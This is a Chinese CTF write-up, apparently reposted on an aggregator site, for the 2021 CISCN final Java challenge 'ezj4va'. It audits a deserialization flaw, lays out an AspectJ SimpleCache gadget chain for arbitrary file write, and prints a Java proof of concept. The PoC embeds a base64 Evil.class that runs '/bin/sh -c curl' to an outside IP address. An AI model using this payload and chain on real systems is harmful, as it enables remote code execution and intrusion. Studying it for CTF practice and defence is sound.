2021-CISCN-fianl-ezj4va
Posted bfengj
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了2021-CISCN-fianl-ezj4va相关的知识,希望对你有一定的参考价值。
2021-CISCN-fianl-ezj4va
前言
去年国赛决赛的0解Java,后来出现在了DASCTF八月挑战赛,当时不太会Java所以没有看,今天找个时间复现了一下。写的比较简单,具体可以看参考链接中的文章。
代码审计
访问/robots.txt得到文件名可以下载到源码。
pom.xml:
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>ciscn.fina1</groupId>
<artifactId>ezj4va</artifactId>
<version>0.0.1-SNAPSHOT</version>
<packaging>jar</packaging>
<properties>
<maven.compiler.source>1.8</maven.compiler.source>
<maven.compiler.target>1.8</maven.compiler.target>
</properties>
<dependencies>
<dependency>
<groupId>org.apache.tomcat.embed</groupId>
<artifactId>tomcat-embed-core</artifactId>
<version>8.5.38</version>
</dependency>
<dependency>
<groupId>org.aspectj</groupId>
<artifactId>aspectjweaver</artifactId>
<version>1.9.5</version>
</dependency>
<dependency>
<groupId>com.alibaba</groupId>
<artifactId>fastjson</artifactId>
<version>1.2.72</version>
</dependency>
</dependencies>
<build>
<finalName>ezj4va</finalName>
<resources>
<resource>
<directory>src/main/webapp</directory>
<targetPath>META-INF/resources</targetPath>
<includes>
<include>*.*</include>
</includes>
</resource>
<resource>
<directory>src/main/resources</directory>
<includes>
<include>**/*.*</include>
</includes>
</resource>
</resources>
<plugins>
<plugin>
<groupId>org.codehaus.mojo</groupId>
<artifactId>appassembler-maven-plugin</artifactId>
<version>2.0.0</version>
<configuration>
<assembleDirectory>target</assembleDirectory>
<programs>
<program>
<mainClass>ciscn.fina1.ezj4va.launch.Main</mainClass>
</program>
</programs>
</configuration>
<executions>
<execution>
<phase>package</phase>
<goals>
<goal>assemble</goal>
</goals>
</execution>
</executions>
</plugin>
</plugins>
</build>
</project>
简单审计之后知道的是,存在反序列化漏洞,依赖中有aspectjweaver但是没有CommonsCollections。
对于整个chain:
Gadget chain:
HashSet.readObject()
HashMap.put()
HashMap.hash()
TiedMapEntry.hashCode()
TiedMapEntry.getValue()
LazyMap.get()
SimpleCache$StorableCachingMap.put()
SimpleCache$StorableCachingMap.writeToPath()
FileOutputStream.write()
其实是要调用SimpleCache$StorableCachingMap.put(),可以发现这里:
@Override
public Cart addToCart(String skus, String oldCartStr) throws Exception
Cart toAdd =(Cart) Deserializer.deserialize(skus);
Cart cart=null;
if(oldCartStr!=null)
cart= (Cart) Deserializer.deserialize(oldCartStr);
if(cart==null)
cart=new Cart();
if(toAdd.getSkuDescribe()!=null)
Map skuDescribe = cart.getSkuDescribe();
for(Map.Entry<String,Object> entry:toAdd.getSkuDescribe().entrySet())
skuDescribe.put(entry.getKey(),entry.getValue());
skuDescribe和entry反序列化之后都可控,所以可以直接触发put()实现任意写,POC:
Class clazz = Class.forName("org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap");
Constructor declaredConstructor = clazz.getDeclaredConstructor(String.class,int.class);
declaredConstructor.setAccessible(true);
Map<String,Object> expMap = (Map<String,Object>)declaredConstructor.newInstance("./", 123);
Cart cart = new Cart();
Field skuDescribeField = Cart.class.getDeclaredField("skuDescribe");
skuDescribeField.setAccessible(true);
skuDescribeField.set(cart,expMap);
Cart toAdd = new Cart();
Map<String,Object> fileMap = new HashMap<>();
String content = "yv66vgAAADQAJgoACQAVCgAWABcHABgIABkIABoIABsKABYAHAcAHQcAHgcAHwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApyZWFkT2JqZWN0AQAeKExqYXZhL2lvL09iamVjdElucHV0U3RyZWFtOylWAQAKRXhjZXB0aW9ucwcAIAEAClNvdXJjZUZpbGUBAAlFdmlsLmphdmEMAAsADAcAIQwAIgAjAQAQamF2YS9sYW5nL1N0cmluZwEABy9iaW4vc2gBAAItYwEAIGN1cmwgaHR0cDovLzEyMS41LjE2OS4yMjM6Mzk4NzYvDAAkACUBAB5jaXNjbi9maW5hMS9lemo0dmEvZG9tYWluL0V2aWwBABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAIAAkAAQAKAAAAAgABAAsADAABAA0AAAAhAAEAAQAAAAUqtwABsQAAAAEADgAAAAoAAgAAAAcABAAIAAIADwAQAAIADQAAADcABQACAAAAG7gAAga9AANZAxIEU1kEEgVTWQUSBlO2AAdXsQAAAAEADgAAAAoAAgAAAAsAGgAMABEAAAAEAAEAEgABABMAAAACABQ=";
fileMap.put("Evil.class",Base64.getDecoder().decode(content));
skuDescribeField.set(toAdd,fileMap);
System.out.println(Base64.getEncoder().encodeToString(SerializeUtil.serialize(cart)));
System.out.println(Base64.getEncoder().encodeToString(SerializeUtil.serialize(toAdd)));
Evil evil = new Evil();
System.out.println(Base64.getEncoder().encodeToString(SerializeUtil.serialize(evil)));
说是写恶意class然后反序列化调用它的readObject,但是接下来具体怎么才能rce就不知道了,环境根据心心的文章说是起的jar包,也不知道后续该怎么rce。如果是tomcat的话就简单多了。如果有师傅知道怎么rce的话可以告诉我嘛呜呜万分感谢。
参考链接
https://www.anquanke.com/post/id/249651#h2-5
以上是关于2021-CISCN-fianl-ezj4va的主要内容,如果未能解决你的问题,请参考以下文章